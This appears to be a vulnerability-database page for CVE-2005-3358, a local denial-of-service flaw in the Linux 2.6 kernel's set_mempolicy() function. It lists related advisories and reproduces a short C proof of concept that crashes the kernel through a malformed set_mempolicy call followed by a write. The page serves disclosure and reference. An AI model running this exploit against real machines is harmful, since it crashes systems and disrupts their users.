Linux Kernel 2.6.x SET_MEMPOLICY Denial of Service vulnerabilit
Reporter | Title | Published | Views | Family All 21 |
---|---|---|---|---|
CVE | CVE-2005-3358 | 14 Dec 200519:03 | β | cve |
UbuntuCve | CVE-2005-3358 | 14 Dec 200500:00 | β | ubuntucve |
NVD | CVE-2005-3358 | 14 Dec 200519:03 | β | nvd |
seebug.org | Linux Kernel set_mempolicyζ¬ε°ζη»ζε‘ζΌζ΄ | 17 Aug 200600:00 | β | seebug |
Cvelist | CVE-2005-3358 | 14 Dec 200519:00 | β | cvelist |
OpenVAS | SLES9: Security update for Linux kernel | 10 Oct 200900:00 | β | openvas |
OpenVAS | SLES9: Security update for Linux kernel | 10 Oct 200900:00 | β | openvas |
OpenVAS | Debian Security Advisory DSA 1017-1 (kernel-source-2.6.8) | 17 Jan 200800:00 | β | openvas |
OpenVAS | Debian: Security Advisory (DSA-1017-1) | 17 Jan 200800:00 | β | openvas |
SUSE Linux | remote denial of service in kernel | 9 Feb 200616:09 | β | suse |
/*
source: https://www.securityfocus.com/bid/16135/info
Linux kernel is prone to a local denial-of-service vulnerability.
This issue affects the 'set_mempolicy()' function of the 'mm/mempolicy.c' file.
Successful exploitation causes the kernel to crash, leading to a denial-of-service condition.
*/
#include <asm/unistd.h>
main(){
syscall(__NR_set_mempolicy,3,0,0);
write(1,10,8192);
}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo